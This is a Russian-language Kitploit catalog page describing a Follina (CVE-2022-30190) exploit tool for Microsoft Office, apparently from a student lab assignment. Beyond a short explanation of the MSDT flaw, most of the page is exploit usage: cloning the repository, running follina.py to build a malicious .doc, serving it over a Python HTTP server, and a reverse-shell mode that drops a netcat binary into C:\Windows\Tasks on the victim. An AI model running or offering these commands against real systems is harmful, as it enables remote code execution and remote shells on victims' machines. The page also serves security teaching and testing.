Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-30190 — Follina (CVE-2022-30190) — это уязвимость нулевого дня в Microsoft Office, которая была недавно обнаружена. Это уязвимость высокой степени серьезности, которую хакеры могут использовать для атак с удаленным выполнением кода (RCE). | Kitploit
Инструменты/GitHubGitHub/aminetitrofine/cve-2022-30190
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubaminetitrofine/cve-2022-30190

CVE-2022-30190

Follina (CVE-2022-30190) — это уязвимость нулевого дня в Microsoft Office, которая была недавно обнаружена. Это уязвимость высокой степени серьезности, которую хакеры могут использовать для атак с удаленным выполнением кода (RCE).

Репозиторий
12613 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE 30190

Amine TITROFINE | 17 декабря 2022


Follina (CVE-2022-30190) — это недавно обнаруженная уязвимость нулевого дня в Microsoft Office. Это уязвимость высокой степени серьезности, которую хакеры могут использовать для атак удаленного выполнения кода (RCE). Она возникает, когда MSDT вызывается с использованием протокола URL из вызывающего приложения, такого как Word. Злоумышленник, успешно использующий эту уязвимость, может выполнить произвольный код с правами вызывающего приложения. Затем злоумышленник может устанавливать программы, просматривать, изменять или удалять данные, а также создавать новые учетные записи в контексте, разрешенном правами пользователя.

Среда

2 ВМ:

  • Атакующая машина
    • kali-linux-2022.3-virtualbox-amd64 (Ссылка для скачивания)
  • Машина жертвы
    • Windows 10 (64 бита) (Ссылка для скачивания)
    • Microsoft Office 2016 Pro (Ссылка для скачивания)

Эксплойт

root@kitploit:~
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git

$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri

$ python3 follina.py –r 9999

После запуска программы follina.py появится файл (follina.doc), содержащий вредоносный скрипт.

Чтобы упростить обмен файлами между двумя ВМ, мы будем использовать Python HTTP-сервер:

root@kitploit:~
$ python3 –m http.server 8080

Примеры

Получить обратную оболочку на порту 9999. Примечание: это загружает бинарный файл netcat на машину жертвы и помещает его в C:\Windows\Tasks. Бинарный файл не удаляется. Это вызовет обнаружение антивирусом, если антивирус не отключен.

root@kitploit:~
$ python3 follina.py -r 9999

Запуск calc.exe:

root@kitploit:~
$ python3 follina.py -c "calc"
[+] скопирован промежуточный doc /tmp/9mcvbrwo
[+] создан вредоносный документ ./follina.doc
[+] раздача html-полезной нагрузки на :8000

Запуск notepad.exe:

root@kitploit:~
$ python3 follina.py -c "notepad"
Скачать инструмент